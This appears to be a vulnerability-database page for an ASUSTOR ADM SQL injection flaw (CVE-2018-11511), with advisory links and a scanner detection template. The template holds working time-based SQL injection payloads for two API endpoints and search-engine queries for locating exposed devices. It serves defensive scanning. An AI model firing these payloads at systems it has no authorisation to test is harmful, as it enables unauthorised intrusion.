| Reporter | Title | Published | Views | Family All 17 |
|---|---|---|---|---|
| ASUSTOR ADM 3.1.0.RFQ3 - Remote Command Execution / SQL Injection Vulnerabilities | 15 Aug 201800:00 | – | zdt | |
| CVE-2018-11511 | 16 Aug 201800:00 | – | attackerkb | |
| CVE-2018-11511 | 5 Oct 202508:40 | – | circl | |
| ASUSTOR ADM SQL Injection Vulnerability | 17 Aug 201800:00 | – | cnvd | |
| CVE-2018-11511 | 16 Aug 201820:00 | – | cve | |
| CVE-2018-11511 | 16 Aug 201820:00 | – | cvelist | |
| ASUSTOR ADM 3.1 album_id SQL Injection | 3 Nov 201800:00 | – | dsquare | |
| ASUSTOR ADM 3.1 scope SQL Injection | 3 Nov 201800:00 | – | dsquare | |
| ASUSTOR ADM 3.1.0.RFQ3 - Remote Command Execution / SQL Injection | 15 Aug 201800:00 | – | exploitdb | |
| EUVD-2018-3540 | 7 Oct 202500:30 | – | euvd |
| Source | Link |
|---|---|
| exploit-db | www.exploit-db.com/exploits/44909 |
| nvd | www.nvd.nist.gov/vuln/detail/CVE-2018-11511 |
id: CVE-2018-11511
info:
name: ASUSTOR ADM 3.1.0.RFQ3 - SQL Injection
author: ritikchaddha
severity: critical
description: |
ASUSTOR ADM version 3.1.0.RFQ3 is vulnerable to SQL injection via the album_id parameter in the /photo-gallery/api/album/tree_lists/ endpoint. An attacker can exploit this vulnerability to execute arbitrary SQL commands on the database, potentially leading to information disclosure or further compromise of the affected system.
impact: |
Unauthenticated attackers can execute arbitrary SQL commands to access, modify, or delete database contents, potentially compromising the entire ASUSTOR ADM system and accessing stored data.
remediation: |
Upgrade to a patched version of ASUSTOR ADM or apply vendor-provided security updates.
reference:
- https://www.exploit-db.com/exploits/44909
- https://nvd.nist.gov/vuln/detail/CVE-2018-11511
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2018-11511
epss-score: 0.11176
epss-percentile: 0.95412
cwe-id: CWE-89
cpe: cpe:2.3:a:asustor:asustor_data_master:3.1.0:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: asustor
product: asustor-data-master
shodan-query: http.html:"ASUSTOR"
fofa-query: body="ASUSTOR" && icon_hash="1678170702"
tags: cve,cve2018,asustor,adm,sqli,vkev,vuln
http:
- raw:
- |
@timeout: 30s
POST /photo-gallery/api/album/tree_lists/ HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
album_id=106298411+AND+SLEEP(9)&start=0&limit=100&order=name_asc&api=v2
- |
@timeout: 30s
POST /photo-gallery/api/photo/search/ HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
keyword=jpg&scope=106298414+AND+SLEEP(9)&start=0&limit=100&order=name_asc&api_mode=browse&api=v2
stop-at-first-match: true
matchers:
- type: dsl
dsl:
- 'duration>=9'
- 'status_code == 200'
- 'contains(body, "success\":")'
- 'contains_any(body, "album_not_exist\"", "album_items\":")'
condition: and
# digest: 490a00463044022017307baeda074ce06399e2d6b626fcd9f99c7109b28dce15d64e29218b3045f702204ce99135d1e23ef2c460f28f51339df22d6dec5478db47312213a8d0c6bb0bad:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation